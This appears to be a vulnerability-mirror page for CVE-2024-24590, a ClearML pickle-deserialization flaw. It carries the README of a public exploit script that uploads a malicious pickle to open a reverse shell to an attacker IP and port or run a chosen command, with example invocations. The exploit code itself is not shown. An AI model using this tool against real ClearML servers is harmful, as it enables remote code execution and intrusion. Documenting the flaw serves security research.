Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-24590 PoC — Allegro 代码问题漏洞

Source
Associated Vulnerability
Title:Allegro 代码问题漏洞 (CVE-2024-24590)
Description:Allegro是Allegro开源的一个主要针对视频游戏和多媒体编程的跨平台库。 Allegro AI ClearML 0.17.0版本及之后版本存在代码问题漏洞,该漏洞源于不可信数据反序列化。攻击者利用该漏洞可以执行任意代码。
Description
CVE-2024-24590 ClearML RCE&CMD POC
Readme
# ClearML Exploit Script

This repository contains a Python exploit script for CVE-2024-24590 The script is designed to upload a malicious pickle file to ClearML, which executes a reverse shell or a custom command.

## Features

- Uploads a malicious pickle artifact to ClearML.
- Executes a reverse shell or a custom command on the target machine.
- Supports custom project and task names.
- Allows setting a tag on the task.

## Usage

### Prerequisites

- Python 3.x
- ClearML SDK
- argparse (usually included with Python)

### Installation

1. Clone the repository:

    ```bash
    git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
    cd CVE-2024-24590-ClearML-RCE-CMD-POC
    ```

2. Install the ClearML SDK:

    ```bash
    pip install clearml
    clearml-init
    ```

### Running the Script

The script supports two modes of operation: `default` and `cmd`.

#### Default Mode

In this mode, you must provide the attacker's IP and port to establish a reverse shell.

```bash
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
```

#### CMD Mode 

In this mode, you can provide a custom command to be executed. 

```bash
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
```

#### Examples 

```bash
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
```

```bash
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"
```

#### whoami
- HackTheBox: sl4sh1t0
- Telegram: sl4sh1t0
- X (Twitter): @diegogarciayala

#### Credits
https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
File Snapshot

[4.0K] /data/pocs/153b038ac3d7a6979052cd9fdf99877eb71c238c ├── [2.9K] exploit.py └── [1.6K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.